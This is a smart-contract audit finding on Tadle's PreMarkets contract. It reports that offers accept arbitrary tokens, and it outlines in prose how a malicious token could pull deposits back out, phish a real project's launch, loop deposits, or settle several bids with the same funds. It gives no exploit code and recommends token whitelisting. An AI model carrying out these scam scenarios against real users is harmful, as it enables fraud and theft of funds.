Tadle

Summary

Arbitrary tokens can be used when creating offers which could allow malicious users to execute some malicious actions and attempt to scam other users using the PreMarket.sol contract

Vulnerability Details

We're going to trace out an example bad token that allows execute transferFrom and approval in same transferFrom, which can allow malicious user to transfers back the initially taken tokens.

An attacker banking on potential bidders looking for points/pre-market token to buy against project can

• setup a flimsy project within a circle and deploy a malicious token as above to trade on Tadle banking on the trust of bidders in Tadle or

• phish a real project and mention all about the launch of pre-market token same time as real project but with a different token address

• create multiple (deposit to create offer action (createOffer -> tillIn -> _transfer) -> transfer back token -> deposit to create offer action -> transfer back token )loops

• settle bids for real users funds or

• settle multiple bids with same fund

https://github.com/Cyfrin/2024-08-tadle/blob/main/src/core/PreMarkets.sol#L39-L101
https://github.com/Cyfrin/2024-08-tadle/blob/main/src/core/TokenManager.sol#L56-L102
https://github.com/Cyfrin/2024-08-tadle/blob/main/src/utils/Rescuable.sol#L104

Impact

Phising real project to steal user funds, DOS, loss of trust is likely too

Tools Used

Manual Review

Recommendations

Whitelist offer and bid tokens but to make it easier use Roles, so multiple trusted entities can whiltelist new pre-market/points tokens